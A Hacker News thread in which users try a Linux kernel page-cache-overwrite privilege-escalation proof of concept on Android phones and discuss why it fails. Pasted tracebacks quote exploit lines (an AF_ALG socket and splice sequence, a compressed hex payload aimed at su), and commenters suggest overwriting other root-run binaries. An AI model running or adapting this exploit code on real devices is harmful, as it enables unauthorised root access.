upvote

points

by rany_18 hours ago |
comments
upvoteby alufers16 hours ago|
next
[-]
I rewrote it quickly to C [1] (and changed the embedded binary to be aarch64).

Unfortunately it fails on calling bind() on my device, so probalby Android doesn't ship with that kenrel module by default :(. So no freedom for my $40 phone.

Putting it out here, maybe somebody else will have better luck.

[1] https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...

reply
upvoteby alufers15 hours ago|
parent|
[-]
Update: Checking the kernel config indeed confirms this.

   adb shell zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
   # CONFIG_CRYPTO_USER_API_HASH is not set
   # CONFIG_CRYPTO_USER_API_SKCIPHER is not set
   # CONFIG_CRYPTO_USER_API_RNG is not set
   # CONFIG_CRYPTO_USER_API_AEAD is not set
reply
upvoteby notpushkin18 hours ago|
prev|
next
[-]
I’ve poked around on my phone and it didn’t work:

    File "/data/data/com.termux/files/home/a.py", line 5, in c
      a=s.socket(38,5,0); # ...
    File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
      _socket.socket.__init__(self, family, type, proto, fileno)
      ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  PermissionError: [Errno 13] Permission denied
reply
upvoteby int0x2918 hours ago|
parent|
[-]
I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 8, in <module> f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) ^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

reply
upvoteby notpushkin17 hours ago|
parent|
[-]
Try /system/bin/ping
reply
upvoteby int0x2917 hours ago|
parent|
[-]
Now the socket is blocked. Also probably should have realized the socket is defined earlier than its called

Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 9, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/home/exploit.py", line 5, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) ^^^^^^^^^^^^^^^^ File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__ _socket.socket.__init__(self, family, type, proto, fileno) PermissionError: [Errno 13] Permission denied

reply
upvoteby fragmede14 hours ago|
parent|
[-]
PoC is also x86_64 only and not arm.
reply
upvoteby tgies12 hours ago|
parent|
[-]
fixed: https://github.com/tgies/copy-fail-c
reply
upvoteby notpushkin4 hours ago|
parent|
[-]
Thanks! Will give it a try a bit later.

(HN algorithms have killed some of your comments, perhaps because you posted the same URL too many times from a relatively new account? I’ve vouched for you, but keep in mind that it triggers antispam.)

---

Edit: naturally, no luck:

  $ ./exploit /system/bin/ping
  [+] target:    /system/bin/ping
  [+] payload:   2112 bytes (528 iterations)
  socket(AF_ALG): Permission denied
  patch_chunk failed at offset 0
Guess AF_ALG is just disabled on Android kernel builds. Though maybe it’ll work on other devices!
reply
upvoteby tripdout17 hours ago|
prev|
next
[-]
There’s SELinux, everything is mounted nosuid, barely anything runs as root except init. I doubt it.
reply
upvoteby angry_octet14 hours ago|
parent|
[-]
You don't need a suit binary for this, they have arbitrary write of memory. The suid binary is just a convenient and portable way to demonstrate it. Real exploits will use many different mechanisms.
reply
upvoteby zb318 hours ago|
prev|
[-]
Android is smarter than setuid + system partitions aren't writable.
reply
upvoteby firer18 hours ago|
parent|
next
[-]
System partitions being non-writable has nothing to do with the vulnerability - it allows modifying the cache of any file that you can open for reading.

Not using setuid anywhere means you'd have to build a slightly more clever exploit, but it's still trivial - just modify some binary you know will run as root "soon".

But... I didn't check, but IIRC the untrusted_app secontext that apps run in is not allowed to open AF_ALG sockets - so you can't directly trigger the vulnerability as a malicious app. Although it might be possible in some roundabout way (requesting some more privileged crypto service to do so).

reply
upvoteby int0x2917 hours ago|
parent|
next
[-]
Edit: Ignore this I overlooked calling order. It is indeed blocked

~~My allegedly fully patched pixel 8 pro allowed an AF_ALG socket to open under termux without virtualization so I'm not sure the last but is true~~

reply
upvoteby zb317 hours ago|
parent|
prev|
[-]
Ah, I blindly assumed such memory would be mapped readonly...
reply
upvoteby int0x2918 hours ago|
parent|
prev|
[-]
Its not writing to the partition though is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.
reply
upvoteby zb317 hours ago|
parent|
[-]
I assumed such memory would be mapped readonly (PROT_READ), without actually looking into it..
reply